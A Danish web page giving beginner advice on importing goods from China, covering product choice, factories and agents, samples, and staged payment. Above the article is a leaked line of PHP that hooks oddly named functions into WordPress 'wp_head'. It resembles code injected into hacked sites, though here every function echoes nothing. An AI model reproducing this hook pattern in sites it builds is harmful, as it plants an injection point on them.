add_action("wp_head", "wpinfoaj2"); function wpinfoaj2(){ echo ""; } add_action("wp_head", "wpinfoaj5"); function wpinfoaj5(){ echo ""; } add_action("wp_head", "wpinfoaj6"); function wpinfoaj6(){ echo ""; }add_action("wp_head", "wpinfoaj1"); function wpinfoaj1(){ echo ""; }

Hvordan begynder jeg at importere fra Kina? | Kina Import Guiden
Kina Import Guiden - Kina Import Guiden – om at importere fra Kina, handel med Kina og produktion i Kina. Læs her inden du starter en kina butik eller webshop med kina varer.

Hvordan begynder jeg at importere fra Kina?

Det første og vigtigste, når du vil importere fra Kina, er at vælge HVAD du vil importere.
Tænk på, at det skal være et produkt som du er interesseret i, fordi det vil gøre hele processen nemmere. Hvis du allerede er interesseret i produktet, så har du allerede viden om produktet, om kvaliteten, om farver, om pris og om hvem målgruppen er. Alt dette vil hjælpe dig igennem processen.

Sørg desuden fo,r at produktet du vælger, ikke er et alt for billigt produkt. Optimalt set så vælg et produkt på mellem 300-600 kr, istedet for et produkt på under 100 kr. Jo dyrere produktet er, jo mere vil du kunne tjene på hvert produkt du sælger.

Vælg også et produkt som du vil kunne sælge en del af, et produkt som folk kan bruge flere af. Vælg ikke et produkt som man bare køber ét af hvert 5 år, for så vil der gå alt for lang tid inden du begynder at se pengene komme ind igen.

Find en fabrik i Kina, der kan stå for produktionen af dine varer, du kan enten finde en fabrik selv eller du kan hyre et agentur i Kina, der findes både Internationale og Danske agenture i Kina, som har erfaring med Kina import og som har kontakter til fabrikker.

Sørg for at så en vareprøve, inden produktionen går igang. Du betaler selv for fragten til Danmark, og selvom det koster noget, så er det vigtigt med en vareprøve, så du kan gennemgå og teste produktet, så det er præcis som det skal være.

Når produktionen går igang, så husk på, kun at betale 30% fra starten, så du har lidt at forhandle med, hvis der skulle blive problemer senere såsom ænding i produktets kvalitet eller forsinkelse i produktionen. Først når du har modtaget hele produktionen betaler du de sidste 70%.